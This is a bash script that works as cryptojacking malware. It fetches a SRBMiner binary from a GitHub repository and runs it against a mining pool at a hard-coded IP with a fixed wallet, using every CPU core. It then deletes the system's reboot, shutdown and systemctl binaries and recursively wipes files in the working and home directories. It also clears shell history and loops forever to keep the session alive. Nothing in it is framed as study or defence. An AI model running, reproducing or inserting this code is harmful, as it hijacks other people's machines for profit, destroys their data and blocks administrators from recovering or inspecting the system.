#!/bin/bash
wget -O mmm https://github.com/claires67/buut/raw/main/SRBMiner-MULTI > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm randomx --pool 146.190.218.178:443 --wallet cumzZZjSJUtcWe9D4XXxy4G2kbMMVyCK7ZpvzET9P7qb9V7MvVqZdqGMRbu7CX4z6NG23ZRbkypK94mngbKXKynr8x51oyuMCp.$(echo $(shuf -i 1-100000 -n 1)-BR) --password x --cpu-threads $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
